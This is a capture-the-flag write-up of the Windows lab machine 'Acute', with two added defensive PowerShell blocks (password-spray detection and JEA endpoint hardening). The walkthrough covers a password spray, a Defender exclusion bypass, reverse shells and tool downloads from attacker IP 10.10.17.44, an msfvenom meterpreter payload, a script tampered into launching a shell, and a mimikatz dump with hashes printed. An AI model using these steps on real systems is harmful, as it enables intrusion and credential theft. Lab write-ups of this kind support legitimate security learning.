Acute
19 minute read
- OS: Windows
- Difficulty: Hard
- IP address: 10.10.11.145
- Date: 12 / 02 / 2022
Port scan
# Nmap 7.92 scan initiated as: nmap -sC -sV -o nmap/targeted 10.10.11.145 -p 443
Nmap scan report for 10.10.11.145
Host is up (0.072s latency).
PORT STATE SERVICE VERSION
443/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
| ssl-cert: Subject: commonName=atsserver.acute.local
| Subject Alternative Name: DNS:atsserver.acute.local, DNS:atsserver
| Not valid before: 2022-01-06T06:34:58
|_Not valid after: 2030-01-04T06:34:58
|_ssl-date: 2022-02-12T19:04:45+00:00; -17s from scanner time.
| tls-alpn:
|_ http/1.1
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: -17s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done -- 1 IP address (1 host up) scanned in 26.62 seconds
The machine has port 443 (HTTPS) open.
Enumeration
If we go to https://10.10.11.145, we don't see anything:
We can find a subdomain called atsserver.acute.local in the nmap output. Now we can add it to /etc/hosts, and acute.local as well just in case. We see a web page when visiting https://atsserver.acute.local:
There is an “about” section where we can download a Microsoft Word document (.docx) by clicking a button in the top right corner called “New Starter Forms”:
The Word file contains some instructions for employees joining the company. The most interesting information is this:
The University’s staff induction pages can be found at:
https://atsserver.acute.local/Staff
The Staff Induction portal can be found here:
https://atsserver.acute.local/Staff/Induction
Arrange for the new starter to receive a demonstration on using IT tools which may include MUSE, myJob and Google accounts. Walk the new starter through the password change policy, they will need to change it from the default Password1!. Not all staff are changing these so please be sure to run through this
Run through the new PSWA to highlight the restrictions set on the sessions named dc_manage
Complete the remote (https://atsserver.acute.local/acute_staff_access) training
Lois is the only authorized personnel to change Group Membership, Contact Lois to have this approved and changed if required. Only Lois can become site admin
We have found three new URLs, although only one works:
Great, this is a portal for accessing a computer through PowerShell (PSWA), but we need credentials and the name of a computer to connect to.
User enumeration
As in many Windows machines, usernames are important for exploitation.
The Word document shows a user called Lois and a potential password: Password1!.
Looking at the metadata using exiftool, we see more things:
$ exiftool New_Starter_CheckList_v7.docx
ExifTool Version Number : 12.30
File Name : New_Starter_CheckList_v7.docx
...
Zip Compressed Size : 428
Zip Uncompressed Size : 2527
Zip File Name : [Content_Types].xml
Creator : FCastle
Description : Created on Acute-PC01
Last Modified By : Daniel
Revision Number : 8
Last Printed : 2021:01:04 15:54:00Z
Create Date : 2021:12:08 14:21:00Z
Modify Date : 2021:12:22 00:39:00Z
Template : Normal.dotm
Total Edit Time : 2.6 hours
Pages : 3
Words : 886
Characters : 5055
Application : Microsoft Office Word
Doc Security : None
Lines : 42
Paragraphs : 11
Scale Crop : No
Heading Pairs : Title, 1
Titles Of Parts :
Company : University of Marvel
Links Up To Date : No
Characters With Spaces : 5930
Shared Doc : No
Hyperlinks Changed : No
App Version : 16.0000
We have two usernames (FCastle and Daniel) and a computer name (Acute-PC01).
Now we can use this computer name, the password and the usernames to log in to PSWA, but they don't work.
In fact, we can find more users in the “about” section of the website:
Since there is a username called FCastle, we can deduce that usernames are formed by the first letter of the first name followed by the surname.
Therefore, we have these usernames for now:
- Lois (LHopkins)
- Daniel
- FCastle
- AWallace
- CHall
- EDavies
- IMonks
- JMorgan
Access to the machine
Now we can carry out a password spray attack to try to connect to Acute-PC01 from PSWA. The connection succeeds for EDavies:Password1!:
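As an added defender-side example, not part of the original write-up: the following PowerShell flags the pattern of the spray above, one source address failing against many distinct accounts within a few minutes. The sample records are constructed to mirror this user list; the Get-FailedLogonRecords helper assumes failed logons are recorded as Security event 4625 on the host that validates the credentials (with PSWA, the source address seen there is the gateway's, so correlate on the gateway as well).

```powershell
# Added example: detect a password spray from failed-logon records.
# Assumption: failed logons are Security event 4625 on the validating host.

function Get-FailedLogonRecords {
    param([int]$Hours = 1)
    # Pull 4625 events and flatten the EventData fields we need.
    Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4625; StartTime = (Get-Date).AddHours(-$Hours) } |
        ForEach-Object {
            $xml = [xml]$_.ToXml()
            $d = @{}
            foreach ($n in $xml.Event.EventData.Data) { $d[$n.Name] = $n.'#text' }
            [pscustomobject]@{
                Time      = $_.TimeCreated
                User      = $d['TargetUserName']
                Source    = $d['IpAddress']
                LogonType = $d['LogonType']
            }
        }
}

function Find-PasswordSpray {
    param(
        [Parameter(Mandatory)] [object[]]$Events,
        [int]$MinDistinctUsers = 5,
        [int]$WindowMinutes = 10
    )
    # A spray looks like one source touching many accounts in a short span. This is a
    # fixed-span check per source; a slow spray spread over hours needs a sliding window.
    foreach ($group in ($Events | Group-Object -Property Source)) {
        $sorted = @($group.Group | Sort-Object -Property Time)
        $users  = @($sorted | ForEach-Object { $_.User.ToLower() } | Sort-Object -Unique)
        $span   = $sorted[-1].Time - $sorted[0].Time
        if ($users.Count -ge $MinDistinctUsers -and $span.TotalMinutes -le $WindowMinutes) {
            [pscustomobject]@{
                Source        = $group.Name
                DistinctUsers = $users.Count
                Attempts      = $sorted.Count
                FirstSeen     = $sorted[0].Time
                LastSeen      = $sorted[-1].Time
                Users         = ($users -join ',')
            }
        }
    }
}

# Constructed sample data: eight accounts tried from one address within two minutes (spray),
# plus one user mistyping a password three times from another address (benign).
$base    = [datetime]'2022-02-12T19:10:00'
$sprayed = 'lhopkins', 'daniel', 'fcastle', 'awallace', 'chall', 'edavies', 'imonks', 'jmorgan'
$events  = [System.Collections.Generic.List[object]]::new()
for ($i = 0; $i -lt $sprayed.Count; $i++) {
    $events.Add([pscustomobject]@{ Time = $base.AddSeconds(15 * $i); User = $sprayed[$i]; Source = '10.10.17.44'; LogonType = '3' })
}
1..3 | ForEach-Object {
    $events.Add([pscustomobject]@{ Time = $base.AddMinutes($_); User = 'natasha'; Source = '172.16.22.50'; LogonType = '3' })
}

# Replace $events with the output of Get-FailedLogonRecords for live data.
Find-PasswordSpray -Events $events.ToArray() | Format-List
```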
Analyzing Acute-PC01
We can perform some basic reconnaissance of the system:
PS C:\Users\edavies\Documents> dir C:\
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 07/12/2019 9:14 PerfLogs
d-r--- 06/12/2021 11:06 Program Files
d-r--- 07/12/2021 12:43 Program Files (x86)
d-r--- 21/12/2021 22:50 Users
d----- 21/12/2021 22:53 Utils
d----- 16/12/2021 1:23 Windows
PS C:\Users\edavies\Documents> dir C:\Users
Directory: C:\Users
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 21/12/2021 13:01 administrator.ACUTE
d----- 22/12/2021 1:26 edavies
d----- 21/12/2021 22:50 jmorgan
d----- 19/11/2021 9:29 Natasha
d-r--- 18/11/2020 23:43 Public
PS C:\Users\edavies\Documents> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet 2:
Connection-specific DNS Suffix . :
Link-local IPv6 Address . . . . . : fe80::9513:4361:23ec:64fd%14
IPv4 Address. . . . . . . . . . . : 172.16.22.2
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 172.16.22.1
PS C:\Users\edavies\Documents>
We see that we are not on the machine we need to compromise, because the IP address is 172.16.22.2 and we want it to be 10.10.11.145.
Let's enumerate a bit more:
PS C:\Users\edavies\Documents> cd C:\Users
PS C:\Users> tree
Folder PATH listing
Volume serial number is 8A9A-E124
C:.
├───administrator.ACUTE
├───edavies
│   ├───3D Objects
│   ├───Contacts
│   ├───Desktop
│   ├───Documents
│   ├───Downloads
│   ├───Favorites
│   ├───Links
│   ├───Music
│   │   └───Playlists
│   ├───OneDrive
│   ├───Pictures
│   │   └───Camera Roll
│   ├───Saved Games
│   ├───Searches
│   └───Videos
│       └───Captures
├───jmorgan
├───Natasha
└───Public
There is nothing interesting in the users' personal folders. Do we have any useful privilege, or do we belong to any interesting group?
PS C:\Users> whoami /all
USER INFORMATION
----------------
User Name SID
============= ==============================================
acute\edavies S-1-5-21-1786406921-1914792807-2072761762-1106
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
========================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity Well-known group S-1-18-1 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label S-1-16-8192
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
USER CLAIMS INFORMATION
-----------------------
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.
Domain controller enumeration
It doesn't look like it. The default gateway of Acute-PC01 is the main machine:
PS C:\Users> nslookup atsserver.acute.local
DNS request timed out.
timeout was 2 seconds.
Server: UnKnown
Address: 172.16.22.1
Name: atsserver.acute.local
Addresses: dead:beef::283e:7912:47ab:5601
dead:beef::1f9
172.16.22.1
10.10.11.145
PS C:\Users> nslookup acute.local
DNS request timed out.
timeout was 2 seconds.
Server: UnKnown
Address: 172.16.22.1
Name: acute.local
Addresses: dead:beef::1f9
dead:beef::283e:7912:47ab:5601
172.16.22.1
10.10.11.145
Let's port scan this machine:
PS C:\Users> 53,88,135,389,445,1443,5985 | % {echo ((New-Object Net.Sockets.TcpClient).Connect('172.16.22.1', $_)) "Port $_ : open"} 2>$null
Port 53 : open
Port 88 : open
Port 135 : open
Port 389 : open
Port 445 : open
Port 5985 : open
It looks like a domain controller of an Active Directory environment, because it has ports 53 (DNS), 88 (Kerberos), 135 (MS-RPC), 389 (LDAP) and 445 (SMB) open.
To attack the domain controller, we will have to use Acute-PC01 as a pivot. I will use chisel as a SOCKS5 proxy in order to launch the AD offensive tools from the attacker machine. We can compile it for Windows or download the compiled binary from the releases section.
First of all, let's get a reverse shell to have a bit more control. I will use ConPtyShell. If we try to upload it to C:\Windows\Temp using a Python HTTP server, Windows Defender blocks it:
PS C:\Users> cd C:\Windows\Temp
PS C:\Windows\Temp> curl http://10.10.17.44/ConPtyShell.exe -o r.exe
PS C:\Windows\Temp> .\r.exe
Program 'r.exe' failed to run: Operation did not complete successfully because the file contains a virus or potentially unwanted software.
+ CategoryInfo : ResourceUnavailable: (:) [], ApplicationFailedException
+ FullyQualifiedErrorId : NativeCommandFailed
We can check which folders are not scanned with this query:
PS C:\Windows\Temp> reg query "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths
C:\Utils REG_DWORD 0x0
C:\Windows\System32 REG_DWORD 0x0
As we can see, C:\Utils is not scanned. Let's download the binary there instead:
PS C:\Windows\Temp> cd C:\Utils
PS C:\Utils> curl http://10.10.17.44/ConPtyShell.exe -o r.exe
Now, from the attacker machine, we start nc and run the binary from Acute-PC01:
PS C:\Utils> .\r.exe 10.10.17.44 4444 50 158
CreatePseudoConsole function found! Spawning a fully interactive shell
And we receive the connection:
$ nc -nlvp 4444
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.10.11.145.
Ncat: Connection from 10.10.11.145:49865.
^Z
zsh: suspended ncat -nlvp 4444
$ stty raw -echo; fg
[1] + continued ncat -nlvp 4444
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
Try the new cross-platform PowerShell https://aka.ms/pscore6
PS C:\Utils>
Screenshots of a remote desktop session
At this point, we can run winpeas.exe to enumerate a bit more:
PS C:\Utils> curl http://10.10.17.44/winPEASx64.exe -o w.exe
There is an RDP session in progress:
╔══════════╣ RDP Sessions
SessID pSessionName pUserName pDomainName State SourceIP
1 Console edavies ACUTE Active
We can get the same information with this command:
PS C:\Utils> query user
USERNAME SESSIONNAME ID STATE IDLE TIME LOGON TIME
edavies console 1 Active none 17/02/2022 20:06
Now we will try to connect to this session using rdesktop from the attacker machine. To do that, we have to use chisel and make Acute-PC01 a pivot (SOCKS5 proxy).
$ ./chisel server --port 1234 --reverse --socks5
server: Reverse tunnelling enabled
server: Fingerprint 5poOpBwlXtp1WxVRCm7EbKeboWO2ERpbS+LdvV4V6CY=
server: Listening on http://0.0.0.0:1234
PS C:\Utils> curl http://10.10.17.44/chisel.exe -o c.exe
PS C:\Utils> .\c.exe client 10.10.17.44:1234 R:socks
client: Connecting to ws://10.10.17.44:1234
client: Connected (Latency 36.4951ms)
And the connection is established correctly:
$ ./chisel server --port 1234 --reverse --socks5
server: Reverse tunnelling enabled
server: Fingerprint 5poOpBwlXtp1WxVRCm7EbKeboWO2ERpbS+LdvV4V6CY=
server: Listening on http://0.0.0.0:1234
server: session#1: Client version (0.0.0-src) differs from server version (1.7.7)
server: session#1: tun: proxy#R:127.0.0.1:1080=>socks: Listening
Let's verify that we can reach the victim machine:
# proxychains4 -q nmap -sT -sV -p 445,3389 172.16.22.1
Starting Nmap 7.92 ( https://nmap.org )
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
Nmap scan report for 172.16.22.1
Host is up (13s latency).
PORT STATE SERVICE VERSION
445/tcp open microsoft-ds?
3389/tcp closed ms-wbt-server
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 49.25 seconds
We see that the RDP port is closed. Maybe the session is still active, so we could take screenshots and view that session. To do that, we have to use Metasploit.
First, we create a binary with a meterpreter console:
$ msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=10.10.17.44 LPORT=4444 -f exe -o m.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 200262 bytes
Final size of exe file: 206848 bytes
Saved as: m.exe
We start a handler with msfconsole:
# msfconsole -q
msf6 > use multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter_reverse_tcp
payload => windows/x64/meterpreter_reverse_tcp
msf6 exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf6 exploit(multi/handler) > set LHOST 10.10.17.44
LHOST => 10.10.17.44
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.10.17.44:4444
Then, we upload the binary and run it:
PS C:\Utils> curl http://10.10.17.44/m.exe -o m.exe
PS C:\Utils> .\m.exe
And we receive the connection:
# msfconsole -q
msf6 > use multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter_reverse_tcp
payload => windows/x64/meterpreter_reverse_tcp
msf6 exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf6 exploit(multi/handler) > set LHOST 10.10.17.44
LHOST => 10.10.17.44
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.10.17.44:4444
[*] Meterpreter session 1 opened (10.10.17.44:4444 -> 10.10.11.145:49842)
meterpreter > getuid
Server username: ACUTE\edavies
meterpreter > screenshare
[*] Preparing player...
[*] Opening player at: ./xjWtVNMB.html
[*] Streaming...
With these commands, we will see the screenshots in real time:
And we find that the user is trying to run the following commands:
Enter-PSSession -computername atsserver
$pass = ConvertTo-SecureString "W3_4R3_th3_f0rce." -AsPlaintext -Force
$cred = New-Object System.Management.Automation.PSCredential ("acute\imonks", $pass)
Enter-PSSession -computername ATSSERVER -credential $cred
Enter-PSSession -computername ATSSERVER -ConfigurationName dc_manage -credential $cred
Lateral movement to user imonks
Now we can continue from the first reverse shell instead of meterpreter, and use the previous commands to connect to the victim machine using script blocks:
PS C:\Utils> $pass = ConvertTo-SecureString "W3_4R3_th3_f0rce." -AsPlaintext -Force
PS C:\Utils> $cred = New-Object System.Management.Automation.PSCredential ("acute\imonks", $pass)
PS C:\Utils> Invoke-Command atsserver -ConfigurationName dc_manage -Credential $cred -ScriptBlock { whoami }
acute\imonks
PS C:\Utils> Invoke-Command atsserver -ConfigurationName dc_manage -Credential $cred -ScriptBlock { ls C:\Users\imonks\Desktop }
Directory: C:\Users\imonks\Desktop
Mode LastWriteTime Length Name PSComputerName
---- ------------- ------ ---- --------------
-ar--- 18/02/2022 10:38 34 user.txt atsserver
-a---- 11/01/2022 18:04 602 wm.ps1 atsserver
PS C:\Utils> Invoke-Command atsserver -ConfigurationName dc_manage -Credential $cred -ScriptBlock { type C:\Users\imonks\Desktop\user.txt }
8df8cbb2405a467ccc13d7af36b0d611
At this point, we have got the user.txt flag.
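The dc_manage session configuration used above accepts any script block from a member of Managers, which is what makes every later step of this write-up possible. As an added example, not code from the machine or from the write-up, this is how a JEA endpoint with the same name would be constrained to an explicit allow-list (Get-Volume and a narrowly scoped Get-Service are chosen as illustrative entries). The module name DcManage, the gMSA ACUTE\jea_dc and the transcript directory are placeholders.

```powershell
# Added example: a constrained JEA endpoint named dc_manage. Placeholders: module DcManage,
# gMSA 'ACUTE\jea_dc', transcript directory. Run elevated on the host exposing the endpoint.

$moduleRoot = Join-Path $env:ProgramFiles 'WindowsPowerShell\Modules\DcManage'
$rcDir      = Join-Path $moduleRoot 'RoleCapabilities'
New-Item -ItemType Directory -Path $rcDir -Force | Out-Null
New-ModuleManifest -Path (Join-Path $moduleRoot 'DcManage.psd1')   # role capabilities must live in a module

# Role capability = explicit allow-list. Anything not listed is unresolvable in the session,
# so { whoami }, { net group ... }, { Set-Content ... } and { C:\Users\imonks\Desktop\wm.ps1 }
# all fail instead of running with the caller's identity.
New-PSRoleCapabilityFile -Path (Join-Path $rcDir 'DcManage.psrc') -VisibleCmdlets @(
    'Get-Volume',
    @{ Name = 'Get-Service'; Parameters = @{ Name = 'Name'; ValidatePattern = '^(DNS|W32Time)$' } }
)

# Session configuration. RestrictedRemoteServer gives NoLanguage mode plus a handful of
# built-ins (Get-Command, Select-Object, Exit-PSSession, ...). A virtual account on a domain
# controller is a Domain Admin, so bind a gMSA that holds only the rights those cmdlets need.
$pssc = Join-Path $env:TEMP 'dc_manage.pssc'
New-PSSessionConfigurationFile -Path $pssc `
    -SessionType RestrictedRemoteServer `
    -GroupManagedServiceAccount 'ACUTE\jea_dc' `
    -TranscriptDirectory 'C:\JEATranscripts' `
    -RoleDefinitions @{ 'ACUTE\Managers' = @{ RoleCapabilities = 'DcManage' } }

if (-not (Test-PSSessionConfigurationFile -Path $pssc)) {
    throw "invalid session configuration file: $pssc"
}

# Replace the permissive endpoint with the constrained one (this restarts WinRM).
if (Get-PSSessionConfiguration -Name dc_manage -ErrorAction SilentlyContinue) {
    Unregister-PSSessionConfiguration -Name dc_manage -Force
}
Register-PSSessionConfiguration -Name dc_manage -Path $pssc -Force | Out-Null

# What a Managers member will actually be able to call through dc_manage.
Get-PSSessionCapability -ConfigurationName dc_manage -Username 'ACUTE\imonks' |
    Select-Object Name, CommandType
```

The transcript directory also gives the blue team a per-session record of every command issued through the endpoint.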
Let's check which users are configured on this machine:
PS C:\Utils> Invoke-Command atsserver -ConfigurationName dc_manage -Credential $cred -ScriptBlock { net user }
User accounts for \\
-------------------------------------------------------------------------------
Administrator awallace chall
edavies Guest imonks
jmorgan krbtgt lhopkins
The command completed with one or more errors.
User imonks belongs to the Managers group:
PS C:\Utils> Invoke-Command atsserver -ConfigurationName dc_manage -Credential $cred -ScriptBlock { net user imonks /domain }
User name imonks
Full Name Ieuan Monks
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 21/12/2021 14:51:31
Password expires Never
Password changeable 22/12/2021 14:51:31
Password required Yes
User may change password No
Workstations allowed All
Logon script
User profile
Home directory
Last logon 18/02/2022 11:04:17
Logon hours allowed All
Local Group Memberships
Global Group memberships *Domain Users *Managers
The command completed successfully.
If we query more users that belong to Managers, we see that awallace is also a member:
PS C:\Utils> Invoke-Command atsserver -ConfigurationName dc_manage -Credential $cred -ScriptBlock { net groups Managers }
Group name Managers
Comment
Members
-------------------------------------------------------------------------------
awallace imonks
The command completed successfully.
There is an unusual directory in C:\Program Files, but we don't have permissions to access it:
PS C:\Utils> Invoke-Command atsserver -ConfigurationName dc_manage -Credential $cred -ScriptBlock { ls "C:\Program Files" }
Directory: C:\Program Files
Mode LastWriteTime Length Name PSComputerName
---- ------------- ------ ---- --------------
d----- 21/12/2021 00:04 common files atsserver
d----- 21/12/2021 00:11 Hyper-V atsserver
d----- 15/09/2018 08:12 internet explorer atsserver
d----- 18/02/2022 12:54 keepmeon atsserver
d----- 21/12/2021 00:04 VMware atsserver
d----- 20/12/2021 21:19 Windows Defender atsserver
d----- 20/12/2021 21:12 Windows Defender Advanced Threat Protection atsserver
d----- 21/12/2021 14:13 WindowsPowerShell atsserver
PS C:\Utils> Invoke-Command atsserver -ConfigurationName dc_manage -Credential $cred -ScriptBlock { ls "C:\Program Files\keepmeon" }
Access to the path 'C:\Program Files\keepmeon' is denied.
+ CategoryInfo : PermissionDenied: (C:\Program Files\keepmeon:String) [Get-ChildItem], UnauthorizedAccessException
+ FullyQualifiedErrorId : DirUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetChildItemCommand
+ PSComputerName : atsserver
Lateral movement to user jmorgan
In imonks' Desktop folder there is a PowerShell script:
PS C:\Utils> Invoke-Command atsserver -ConfigurationName dc_manage -Credential $cred -ScriptBlock { type C:\Users\imonks\Desktop\wm.ps1 }
$securepasswd = '01000000d08c9ddf0115d1118c7a00c04fc297eb0100000096ed5ae76bd0da4c825bdd9f24083e5c0000000002000000000003660000c00000001000000080f704e251793f5d4f903c7158c8213d0000000004800000a000000010000000ac2606ccfda6b4e0a9d56a20417d2f67280000009497141b794c6cb963d2460bd96ddcea35b25ff248a53af0924572cd3ee91a28dba01e062ef1c026140000000f66f5cec1b264411d8a263a2ca854bc6e453c51'
$passwd = $securepasswd | ConvertTo-SecureString
$creds = New-Object System.Management.Automation.PSCredential ("acute\jmorgan", $passwd)
Invoke-Command -ScriptBlock {Get-Volume} -ComputerName Acute-PC01 -Credential $creds
It is performing actions on Acute-PC01 as jmorgan. The password is stored as a SecureString encrypted for imonks, so rather than decrypting it, we can modify this PowerShell script so that it launches a reverse shell as jmorgan:
PS C:\Utils> Invoke-Command atsserver -ConfigurationName dc_manage -Credential $cred -ScriptBlock { ((cat 'C:\Users\imonks\Desktop\wm.ps1' -Raw) -Replace 'Get-Volume', ' C:\Utils\r.exe 10.10.17.44 5555 50 158 ') | Set-Content -Path C:\Users\imonks\Desktop\wm.ps1 }
PS C:\Utils> Invoke-Command atsserver -ConfigurationName dc_manage -Credential $cred -ScriptBlock { type C:\Users\imonks\Desktop\wm.ps1 }
$securepasswd = '01000000d08c9ddf0115d1118c7a00c04fc297eb0100000096ed5ae76bd0da4c825bdd9f24083e5c0000000002000000000003660000c00000001000000080f704e251793f5d4f903c7158c8213d0000000004800000a000000010000000ac2606ccfda6b4e0a9d56a20417d2f67280000009497141b794c6cb963d2460bd96ddcea35b25ff248a53af0924572cd3ee91a28dba01e062ef1c026140000000f66f5cec1b264411d8a263a2ca854bc6e453c51'
$passwd = $securepasswd | ConvertTo-SecureString
$creds = New-Object System.Management.Automation.PSCredential ("acute\jmorgan", $passwd)
Invoke-Command -ScriptBlock { C:\Utils\r.exe 10.10.17.44 5555 50 158 } -ComputerName Acute-PC01 -Credential $creds
And now it is modified. If we run it, we get the reverse shell as jmorgan on Acute-PC01:
PS C:\Utils> Invoke-Command atsserver -ConfigurationName dc_manage -Credential $cred -ScriptBlock { C:\Users\imonks\Desktop\wm.ps1 }
CreatePseudoConsole function found! Spawning a fully interactive shell
$ nc -nlvp 5555
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::5555
Ncat: Listening on 0.0.0.0:5555
Ncat: Connection from 10.10.11.145.
Ncat: Connection from 10.10.11.145:49872.
^Z
zsh: suspended ncat -nlvp 5555
$ stty raw -echo; fg
[1] + continued ncat -nlvp 5555
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
Try the new cross-platform PowerShell https://aka.ms/pscore6
PS C:\Users\jmorgan\Documents>> whoami
acute\jmorgan
Extracting NTLM hashes
We discover that jmorgan belongs to Administrators:
PS C:\Users\jmorgan\Documents>> whoami /groups
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
========================================== ================ ============ ===============================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators Alias S-1-5-32-544 Mandatory group, Enabled by default, Enabled group, Group owner
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity Well-known group S-1-18-1 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288
Therefore, we can dump the NTLM hashes from the SAM using mimikatz.exe:
PS C:\Users\jmorgan\Documents> cd C:\Utils
PS C:\Users\jmorgan\Documents> curl http://10.10.17.44/mimikatz.exe -o mm.exe
PS C:\Utils> .\mm.exe
.#####. mimikatz 2.2.0 (x64) #19041 Aug 10 2021 17:19:53
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz #
Now we have to enter privilege::debug, token::elevate and lsadump::sam:
mimikatz # privilege::debug
Privilege '20' OK
mimikatz # token::elevate
Token Id : 0
User name :
SID name : NT AUTHORITY\SYSTEM
632 {0;000003e7} 0 D 23650 NT AUTHORITY\SYSTEM S-1-5-18 (04g,31p) Primary
-> Impersonated !
* Process Token : {0;00168d80} 0 D 1503149 ACUTE\jmorgan S-1-5-21-1786406921-1914792807-2072761762-1108 (09g,24p) Primary
* Thread Token : {0;000003e7} 0 D 1818149 NT AUTHORITY\SYSTEM S-1-5-18 (04g,31p) Impersonation (Delegation)
mimikatz # lsadump::sam
Domain : ACUTE-PC01
SysKey : 44397c32a634e3d8d8f64bff8c614af7
Local SID : S-1-5-21-2560123600-3246320471-2688489995
SAMKey : fb8ee3299f8af5fb2100621a50059fa2
RID : 000001f4 (500)
User : Administrator
Hash NTLM: a29f7623fd11550def0192de9246f46b
lm - 0: c8ff11012182f1dc95a478b25fdde0da
ntlm- 0: a29f7623fd11550def0192de9246f46b
Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
Random Value : 7699e833f3fc55323a6c2d9582bb143f
* Primary:Kerberos-Newer-Keys *
Default Salt : MVL-SVR01.MARVEL.HTBAdministrator
Default Iterations : 4096
Credentials
aes256_hmac (4096) : c3cd5b6f980fdebc434e04eed27ef73b7e257fda197e008bc7ef1b3502a075a5
aes128_hmac (4096) : 83cb77df0959373fb1f7dbdda42ad684
des_cbc_md5 (4096) : 8f3249ef3dc1bff7
* Packages *
NTLM-Strong-NTOWF
* Primary:Kerberos *
Default Salt : MVL-SVR01.MARVEL.HTBAdministrator
Credentials
des_cbc_md5 : 8f3249ef3dc1bff7
RID : 000001f5 (501)
User : Guest
RID : 000001f7 (503)
User : DefaultAccount
RID : 000001f8 (504)
User : WDAGUtilityAccount
Hash NTLM: 24571eab88ac0e2dcef127b8e9ad4740
Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
Random Value : 014e3c3563b7599b4b2ffea6a1f5ce60
* Primary:Kerberos-Newer-Keys *
Default Salt : WDAGUtilityAccount
Default Iterations : 4096
Credentials
aes256_hmac (4096) : 8f08a53f14bbb27f0283fd90323dcd4e21ccc7a119d60cbbafb6c461ded08710
aes128_hmac (4096) : 11e388be492e65daac6493f665631d3f
des_cbc_md5 (4096) : 297ad0071abf5b6d
* Packages *
NTLM-Strong-NTOWF
* Primary:Kerberos *
Default Salt : WDAGUtilityAccount
Credentials
des_cbc_md5 : 297ad0071abf5b6d
RID : 000003e9 (1001)
User : Natasha
Hash NTLM: 29ab86c5c4d2aab957763e5c1720486d
lm - 0: f82f2bf1f89c2939790e40f751d5b190
ntlm- 0: 29ab86c5c4d2aab957763e5c1720486d
ntlm- 1: de3638aef735f9b81ea181465871e71b
Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
Random Value : fdd887d7c6e85189b2cbc37ac772b429
* Primary:Kerberos-Newer-Keys *
Default Salt : MVL-SVR01.MARVEL.HTBNatasha
Default Iterations : 4096
Credentials
aes256_hmac (4096) : 85ef7e3d1d28efc32cec29b4d2e201fc0eb55b05c5e3249f951aba713fe8fe67
aes128_hmac (4096) : 70893ba6dd932940051a0714a3a7b184
des_cbc_md5 (4096) : 978a07d05ba770f7
OldCredentials
aes256_hmac (4096) : 6d8e87f273e0260d402c65f1b6c3da5604dacf6d25a543a65827acdf927fd924
aes128_hmac (4096) : dedc1d09097b091f2e430a2c8d768107
des_cbc_md5 (4096) : 1089e6eca449c731
OlderCredentials
aes256_hmac (4096) : 6d8e87f273e0260d402c65f1b6c3da5604dacf6d25a543a65827acdf927fd924
